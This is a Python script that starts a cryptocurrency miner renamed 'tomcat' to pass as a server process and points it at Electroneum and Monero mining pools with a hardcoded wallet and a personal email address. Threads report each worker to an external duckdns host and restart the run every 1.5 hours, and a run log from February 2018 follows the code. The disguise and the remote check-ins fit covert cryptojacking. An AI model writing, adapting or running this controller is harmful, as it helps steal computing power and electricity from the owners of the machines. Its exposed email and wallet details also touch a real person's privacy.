import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:14:07.514765
#2018-02-17 17:02:04.190304
#2018-02-17 18:49:01.520382
#2018-02-17 20:38:07.374400
#2018-02-17 22:24:06.610753
#2018-02-18 00:08:06.080243
#2018-02-18 01:59:04.835172
#2018-02-18 03:46:06.335535
#2018-02-18 05:34:06.067578
#2018-02-18 07:27:05.281218
#2018-02-18 09:14:04.923336
#2018-02-18 11:01:04.201789
#2018-02-18 12:47:06.430854
#2018-02-18 14:33:01.692194
#2018-02-18 16:23:03.791536
#2018-02-18 18:12:06.443210
#2018-02-18 19:59:03.913609
#2018-02-18 21:46:06.620943
#2018-02-18 23:36:06.586281
#2018-02-19 01:22:06.541906
#2018-02-19 03:10:07.970904
#2018-02-19 04:55:06.985675
#2018-02-19 06:41:03.659814
#2018-02-19 08:31:04.316684
#2018-02-19 10:20:09.986075
#2018-02-19 12:08:08.325675
#2018-02-19 13:55:08.652378
#2018-02-19 15:44:02.116620
#2018-02-19 17:32:04.678731
#2018-02-19 19:18:06.497986
#2018-02-19 21:06:05.812415
#2018-02-19 22:53:07.732389
#2018-02-20 00:38:05.607052
#2018-02-20 02:27:05.502108
#2018-02-20 04:17:06.907677
#2018-02-20 06:01:07.517351
#2018-02-20 07:46:01.943607
#2018-02-20 09:31:08.519631
#2018-02-20 11:14:06.536411
#2018-02-20 13:02:08.745337
#2018-02-20 14:46:01.480766
#2018-02-20 16:32:07.498226
#2018-02-20 18:18:08.392842
#2018-02-20 20:09:01.784139
#2018-02-20 21:55:04.768750
#2018-02-20 23:37:03.793936
#2018-02-21 01:21:05.585211
#2018-02-21 03:09:01.848380
#2018-02-21 04:56:04.864183
#2018-02-21 06:44:06.225867
#2018-02-21 08:31:05.888081
#2018-02-21 10:16:05.573238
#2018-02-21 12:04:10.124590
#2018-02-21 13:52:09.231888
#2018-02-21 15:38:07.004207
#2018-02-21 17:28:04.153068
#2018-02-21 19:14:08.057401
#2018-02-21 21:02:01.881819
#2018-02-21 22:47:06.832130
#2018-02-22 00:33:03.758827
#2018-02-22 02:19:06.158525
#2018-02-22 04:06:08.777426
#2018-02-22 05:51:01.847132
#2018-02-22 07:36:06.665578
#2018-02-22 09:25:06.977028
#2018-02-22 11:11:07.819981
#2018-02-22 12:56:07.707036
#2018-02-22 14:44:08.863873
#2018-02-22 16:31:09.498658
#2018-02-22 18:17:01.969037
#2018-02-22 20:07:05.735733
#2018-02-22 21:54:04.632492
#2018-02-22 23:40:09.570790
#2018-02-23 01:29:02.216363
#2018-02-23 03:16:01.318297
#2018-02-23 05:02:05.991161
#2018-02-23 06:47:02.223475
#2018-02-23 08:35:04.440982
#2018-02-23 10:49:06.047758
#2018-02-23 12:46:07.884097
#2018-02-23 14:31:01.491022
#2018-02-23 16:20:08.901400
#2018-02-23 18:08:01.360184
#2018-02-23 19:52:07.912327
#2018-02-23 21:35:08.295238
#2018-02-23 23:23:05.206543
#2018-02-24 01:16:06.259129
#2018-02-24 03:08:04.651896
#2018-02-24 04:54:02.048859
#2018-02-24 06:39:05.055634
#2018-02-24 08:28:07.972820
#2018-02-24 10:14:06.221357
#2018-02-24 12:09:06.630651
#2018-02-24 13:56:07.766392
#2018-02-24 15:47:01.721069
#2018-02-24 17:41:05.061410
#2018-02-24 19:26:01.642104
#2018-02-24 21:16:05.978155
#2018-02-24 23:53:01.341610
#2018-02-25 03:11:01.738882
#2018-02-25 06:58:01.909056